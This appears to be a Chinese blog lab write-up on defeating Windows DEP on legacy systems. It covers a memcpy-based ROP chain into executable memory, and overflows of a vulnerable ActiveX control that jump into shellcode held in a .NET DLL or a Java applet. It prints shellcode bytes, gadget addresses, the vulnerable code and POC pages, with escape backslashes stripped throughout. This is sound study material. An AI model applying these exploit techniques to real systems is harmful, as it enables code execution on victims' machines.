.net执行java方法,攻击DEP的方法(下)——可执行内存、.Net、Java Applet

于 2021-03-31 19:14:01 发布
阅读量408 收藏
点赞数
文章标签: .net执行java方法

1. 利用可执行内存

1.1 实验代码#include

#include

#include

#include

char shellcode[] =

"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"

"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"

"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"

"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"

"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"

"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"

"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"

"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"

"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"

"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"

"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"

"x90x90x90x90"

"x8Ax17x84x7C" // pop eax retn

"x0Bx1AxBFx7C" // pop pop retn

"xBAxD9xBBx7C" // 修正EBP

"x5Fx78xA6x7C" // pop retn

"x08x00x14x00" // 弹出机器码在可执行空间的起始地址,转入执行用

"x00x00x14x00" // 可执行内存空间地址,复制用

"xBFx7DxC9x77" // push esp jmp eax && 跳转至(pop pop retn地址)

"xFFx00x00x00" // shellcode 长度

"xACxAFx94x7C" // memcpy入口

"xFCx68x6Ax0Ax38x1Ex68x63x89xD1x4Fx68x32x74x91x0C"

"x8BxF4x8Dx7ExF4x33xDBxB7x04x2BxE3x66xBBx33x32x53"

"x68x75x73x65x72x54x33xD2x64x8Bx5Ax30x8Bx4Bx0Cx8B"

"x49x1Cx8Bx09x8Bx69x08xADx3Dx6Ax0Ax38x1Ex75x05x95"

"xFFx57xF8x95x60x8Bx45x3Cx8Bx4Cx05x78x03xCDx8Bx59"

"x20x03xDDx33xFFx47x8Bx34xBBx03xF5x99x0FxBEx06x3A"

"xC4x74x08xC1xCAx07x03xD0x46xEBxF1x3Bx54x24x1Cx75"

"xE4x8Bx59x24x03xDDx66x8Bx3Cx7Bx8Bx59x1Cx03xDDx03"

"x2CxBBx95x5FxABx57x61x3Dx6Ax0Ax38x1Ex75xA9x33xDB"

"x53x68x77x65x73x74x68x66x61x69x6Cx8BxC4x53x50x50"

"x53xFFx57xFCx53xFFx57xF8";

void test()

{

char str[176];

//__asm int 3

memcpy(str, shellcode, 450);

}

int main()

{

HINSTANCE hInst = LoadLibrary("shell32.dll");

char temp[200];

test();

return 0;

}

1.2 实验内容

实验思路禁用GS和SafeSEH

test存在溢出

覆盖返回地址后,通过Ret2Libc技术,利用memcpy函数将shellcode复制到可读可写可执行区域

最后在这段可执行的内存空间中执行shellcode,实现DEP的绕过

实验环境推荐使用环境备注操作系统Windows 2003 SP2

DEP状态Optout

编译器VC 6.0

编译选项禁用优化选项

build版本debug版本

在OllyDbg中可以看出,在0x00140000的位置,Access和Initial Access都是RWE,这代表这一段是可读可写可执行的内存,长度为0x1000。源内存起始地址 [ebp+0xC],用push esp jmp eax指令地址来填充,push esp后这个位置会覆盖为当前esp,以实现源内存起始地址的动态获取

复制字符串长度:0xFF [ebp+0x10]

目的地址0x00140000 [ebp+0x8]

实验中,溢出字符串起始地址0x0012FDB0,返回地址0x0012FE68

pop eax retn地址:0x7C84178A

pop pop retn地址:0x7CBF1A0B(pop ebx pop edi retn)

修正EBP retn 4地址:0x7CBBD9BA(push esp pop ebp retn 4)

pop ecx retn地址:0x7CA6785F

push esp jmp eax地址:0x77C97DBF(用于跳转)

memcpy入口地址:0x7C94AFAC

2. 利用.NET

实验支持:具有溢出漏洞的ActiveX控件

包含shellcode的.NET控件

可以触发ActiveX控件中溢出漏洞的POC页面

2.1 ActiveX控件

ActiveX控件void CVulnerAX_DEPCtrl::test(LPCTSTR str)

{

// AFX_MANAGE_STATE(AfxGetStaticModuleState());

// TODO: Add your dispatch handler code here

printf("aaaa");

char dest[100];

sprintf(dest, "%s", str);

}

实验环境:推荐使用环境备注操作系统Windows XP SP3

编译器Visual Studio 2008

优化禁用优化选项

MFC在静态库中使用MFC工程属性->General->Use of MFC

字符集使用Unicode字符集工程属性->General->Character Set

build版本release版本

编译好控件之后,在实验机器上注册该ActiveX控件.regsvr32

2.2 包含shellcode的.NET控件在VS2008中C#下边建立一个DLL解决方案

1c4b551b87a5e4357b04ed56f250c6ec.png

包含shellcode的.NET控件代码using System;

using System.Collections.Generic;

using System.Linq;

using System.Text;

namespace DEP_NETDLL

{

public class Class1

{

public void Shellcode()

{

string shellcode =

"u9090u9090u9090u9090u9090u9090u9090u9090" +

"u68fcu0a6au1e38u6368ud189u684fu7432u0c91" +

"uf48bu7e8du33f4ub7dbu2b04u66e3u33bbu5332" +

"u7568u6573u5472ud233u8b64u305au4b8bu8b0c" +

"u1c49u098bu698buad08u6a3du380au751eu9505" +

"u57ffu95f8u8b60u3c45u4c8bu7805ucd03u598b" +

"u0320u33ddu47ffu348bu03bbu99f5ube0fu3a06" +

"u74c4uc108u07caud003ueb46u3bf1u2454u751c" +

"u8be4u2459udd03u8b66u7b3cu598bu031cu03dd" +

"ubb2cu5f95u57abu3d61u0a6au1e38ua975udb33" +

"u6853u6577u7473u6668u6961u8b6cu53c4u5050" +

"uff53ufc57uff53uf857";

}

}

}

实验环境:推荐使用环境备注操作系统Windows XP SP3

编译器Visual Studio 2008

基址0x24240000

build版本Debug版本Release版本的优化会影响shellcode

设置DLL的基址方法如下:"Project->Properties->Build->Advanced"

c3c43a957556f5428208a40a697f9eb6.png

2.3 POC及测试

编译好DLL之后,需要将DLL和溢出ActiveX控件的POC页面放到同一目录下,并通过如下调试代码调用

Shellcode设置好后,就来设置POC页面,并将POC页面与.NET控件放到一台WEB服务器上,在实验机上访问这个POC页面,以触发ActiveX中的溢出漏洞,通过.NET控件绕过DEP。

POC页面如下

var s = "u9090";

while(s.length < 54){

s += "u9090";

}

s += "u24E2u2424";

test.test(s);

实验解释:为了简单地反映绕过DEP的过程,本实验所攻击的ActiveX控件不启用GS

通过web页面同时加载具有溢出漏洞的ActiveX控件和包含shellcode的.NET控件

ActiveX控件中的test函数存在典型的溢出

编译.NET控件的时候,我们设置DLL的基址,所以我们将函数的返回地址覆盖为.NET控件中的shellcode起始地址,进而转入shellcode执行

实验使用Unicode编码,在计算填充长度时要考虑Unicode与Ascii编码之间的长度差问题

实验环境:推荐使用环境备注操作系统Windows XP SP3

DEPOptout

浏览器IE6

当弹出下面所示对话框时用OllyDbg附加IE的进程,附加好后按一下F9键让程序继续运行。

8f3edc5ecc5bdf2e40960ce789b0bec3.png

然后转到DEP_NETDLL.dll的内存空间中查找shellcode的具体位置,然后进入该内存空间。

shellcode的起始地址0x242424DF。而我们填充的字符串起始地址0x01EFF534,函数返回地址0x01EFF5A0,所以填充108(0x6C)字节就可以覆盖返回地址。 令人意外的是,我们无法包含dll文件,使用了所有可能的办法,都无法在html中使用dll

3. 利用java applet

实验支持:具有溢出漏洞的ActiveX控件

包含shellcode的Java Applet控件

可以触发ActiveX控件中溢出漏洞的POC页面

3.1 ActiveX控件

上一讲已经介绍

3.2 包含shellcode的Java Applet控件

实验代码import java.applet.*;

import java.awt.*;

public class Shellcode extends Applet{

public void init(){

Runtime.getRuntime().gc();

StringBuffer buffer = new StringBuffer(255);

buffer.append("u9090u9090u9090u9090u9090u9090u9090u9090" +

"u68fcu0a6au1e38u6368ud189u684fu7432u0c91" +

"uf48bu7e8du33f4ub7dbu2b04u66e3u33bbu5332" +

"u7568u6573u5472ud233u8b64u305au4b8bu8b0c" +

"u1c49u098bu698buad08u6a3du380au751eu9505" +

"u57ffu95f8u8b60u3c45u4c8bu7805ucd03u598b" +

"u0320u33ddu47ffu348bu03bbu99f5ube0fu3a06" +

"u74c4uc108u07caud003ueb46u3bf1u2454u751c" +

"u8be4u2459udd03u8b66u7b3cu598bu031cu03dd" +

"ubb2cu5f95u57abu3d61u0a6au1e38ua975udb33" +

"u6853u6577u7473u6668u6961u8b6cu53c4u5050" +

"uff53ufc57uff53uf857");

}

}

编译成class文件后,在Web中通过如下代码调用

实验环境:推荐使用环境备注操作系统Windows XP SP3

Java JDK1.4.2

目标版本1.1脱离JRE,在不具有JRE机器上也能执行

编译指令javac 路径Shellcode.java -target 1.1

3.3 POC及其利用

编译产生的Shellcode.class与POC放到同一目录下

POC页面代码

var s = "u9090";

while(s.length < 54){

s += "u9090";

}

s += "u04FCu1001";

test.test(s);

代码解释:ActiveX不使用GS

通过Web页面同时加载具有溢出漏洞的ActiveX控件和包含shellcode的Java applet控件

java applet的内存空间中具有可执行权限,所以我们的shellcode有执行的机会

ActiveX控件中的test函数存在典型的溢出

将函数的返回地址覆盖为Java Applet中的.text段的shellcode起始地址,进而转入shellcoe中执行

实验用Unicode编码,需要考虑Unicode与Ascii之间的转换

实验环境:推荐使用环境备注操作系统Windows XP SP3

DEP状态Optout

JRE状态启用

Java JDK1.4.2不要使用高版本的JRE,否则Java applet申请的内存不在IE进程中

浏览器IE6

在浏览器中启用JRE:Internet选项->高级->Java->将Java……用于

当弹出“开始溢出”对话框时用OllyDbg附加IE进程,附加好后用F9继续执行。而shellcode地址可以通过OllyFindAddr插件中的Custom-Search搜索弹出对话框机器码的前4字节"FC686A0A"来定位shellcode

大不列颠一号mkq
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
C#应用程序关闭WIN7系统DEP执行保…
一览众山小
03-14 3714
最近在做项目,由于应用程序中调用了第三方的DLL,运行在WIN7上发现被DEP拦截了,程序跑不起来。网上一阵搜索发现是由于VS开发工具在编译C#项目的时候会在PE头文件里面将DEP开关打开,而C#工程又没有这个关闭的开关【C++工程是有这个开关的】,最后终于找到了一个方法,在项目生产后执行事件里添加关闭DEP命令行即可。 项目属性---》生产事件---》后期生成事件命令行---》编辑后期生成事件
EAS的DEP客户端脚本中执行select和update的sql语句的方法
05-31
EAS二次开发中DEP在编辑或者列表界面写脚本时可调用的执行sql语句的方法。【本方法仅用于客户端代码中,如果是服务端代码,即对某实体进行DEP拓展,请参照官方出品DEP脚本指南】
.net+套用java+applet_Snowdream
weixin_31131927的博客
03-01 132
看过了一本Java入门的教材后再来看Thinking in Java感觉真好初始化与清理1. 涉及进本类型的重载如果某个方法f1有参数为char, byte, short, int, long, float, double的重载方法(注意类型是从小到大排列的),调用时自左往右套用。如f1(5)调用了f1(int),f1((long)5)调用了f1(long)2. 一个对象,如果没有写任何构造方法,...
java运行asp,在ASP.NET MVC应用程序中运行Java Applet
weixin_33816047的博客
03-11 103
我有一个运行在asp.net Web应用程序中没有问题的小程序...但是,当涉及到ASP.MVC应用程序时,.. applet无法正常工作,抛出类未找到异常请让我知道是否有人可以在MVC应用程序中运行小程序..以下是视图中的代码codebase="http://java.sun.com/update/1.6.0/jinstall-6u11-windows-i586.cab#Version=6,0,...
数据执行保护(DEP)的基本设置
我本善良编程专栏
05-28 1万+
1)执行权限 必须是管理员,而且可以修改boot.ini文件2)数据执行保护DEP的几个可选参数   NOExecute=Optin (为关键Windows程序和服务启用数据执行保护)   NOExecute=Optout (除所选之外,为所有程序和服务启用数据执行保护)   NOExecute=AlwaysOff(关闭数据执行保护功能){选项处于灰色状态}   NOExecute=AlwaysOn(将整个系统置于DEP保护范围以内,所有进程将始终在应用DEP的情况下运行)3)可以通过修改BOOT.INI文
您不能在64位可执行文件上设置DEP属性
weixin_43537911的博客
12-19 2万+
1. 64位系统:C:\Windows\SysWOW64\dllhost.exe 32位系统:C:\Windows\System32\dllhost.exe 2.https://mos86.com/41304.html
JCodeModel:java.net GlassFish中com.sun.codemodel项目的分支
05-08
java.net一片废墟的情况下,似乎是分叉该项目,清理它并添加一些新功能(例如Java 7语法)的好时机。 当前版本是1.0.3 ,其中包含一些修复程序,输出的外观改进以及一些内部类的改进功能,以支持的开发。 非常...
使用dep 配置golang 开发环境的操作方法
01-20
概要 golang 的包管理一直没有官方统一...dep 的 Roadmap 中已经制定了成为 golang 官方包管理工具的计划, 所以,使用 dep 来组织自己的 golang 项目以后能够更好的和其他 golang 项目结合。 配置 golang 的配置 我的
利用dep代替go get获取私有库的方法教程
12-26
这个命令在内部实际上分成了两步操作:第一步是下载源码包,第二步是执行go install。下载源码包的go工具会自动根据不同的域名调用不同的源码工具,对应关系如下: BitBucket (Mercurial Git) GitHub (Git) ...
Java语言程序设计课程教学方法探析.pdf
最新发布
12-27
Java 语言程序设计课程教学方法探析 本文探讨了 Java 语言程序设计课程教学方法的探析,旨在提高学生的独立编写软件的能力、自己思考和创新的能力,进而提高学生的就业竞争力。本文从理论和实践两个方面提出教学...
加密的m3u8视频下载支持本地m3u8
qq_42526332的博客
10-14 5512
m3u8合并解密下载2.3版本 qq群:366950911 支持QQ、UC浏览器等缓存视频合并解密(此软件免费使用),以及KEY大小是16字节的都可以解密,如下图: 如果您无法获取KEY,或者KEY二次加密,无法正常解密视频。可以加作者QQ:2653928713 在之前的版本上增加了批量下载功能 支持 本地m3u8下载,和m3u8链接下载,以及m3u8直播链接下载,下载后自动合并解密。 下载解密成功: TS是日本高清摄像机拍摄下进行的封装格式,全称为MPEG2-TS。TS即"Transport St
.net+套用java+applet_关于Java Applet使用Client和Net两种启动方式时复制粘贴的实现
weixin_36036447的博客
03-01 80
使用情景:关于Java Applet使用Client和Net两种启动方式时复制粘贴的实现MyApplet.javaimport java.awt.BorderLayout;import java.io.UnsupportedEncodingException;import java.net.URLDecoder;import java.net.URLEncoder;import javax.swi...
Java中如何正确的终止线程
热门推荐
Learning
12-02 4万+
1、Java中API自带的stop()方法,来终止线程         查阅JDK,不难发现Thread提供了一个stop()方法,但是stop()方法是一个被废弃的方法。为什么stop()方法被废弃而不被使用呢?原因是stop()方法太过于暴力,会强行把执行一半的线程终止。这样会就不会保证线程的资源正确释放,通常是没有给与线程完成资源释放工作的机会,因此会导致程序工作在不确定的状态下。关于使用
Applet【总结】
_
03-01 6028
1. Applet的基本工作原理?答:Applet是一种特殊的Java程序。作为解释型语言,Java的字节码程序需要一个专门的解释器来执行它。对于Java Application来说,这个解释器就是独立的软件,如JDK的java.exe,VJ++的jview.exe等:而对于Java Applet来说,这个解释器就是兼容Java的Internet浏览器。        Applet的基本工作原理:...
缓冲区溢出攻击原理、方法及防范
06-09
3. 使用内存保护机制:使用内存保护机制,如ASLR(地址空间布局随机化)、DEP(数据执行保护)等技术,可以保护程序的内存空间,防止缓冲区溢出攻击。 4. 使用安全编程技术:使用安全编程技术,如使用安全函数、...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值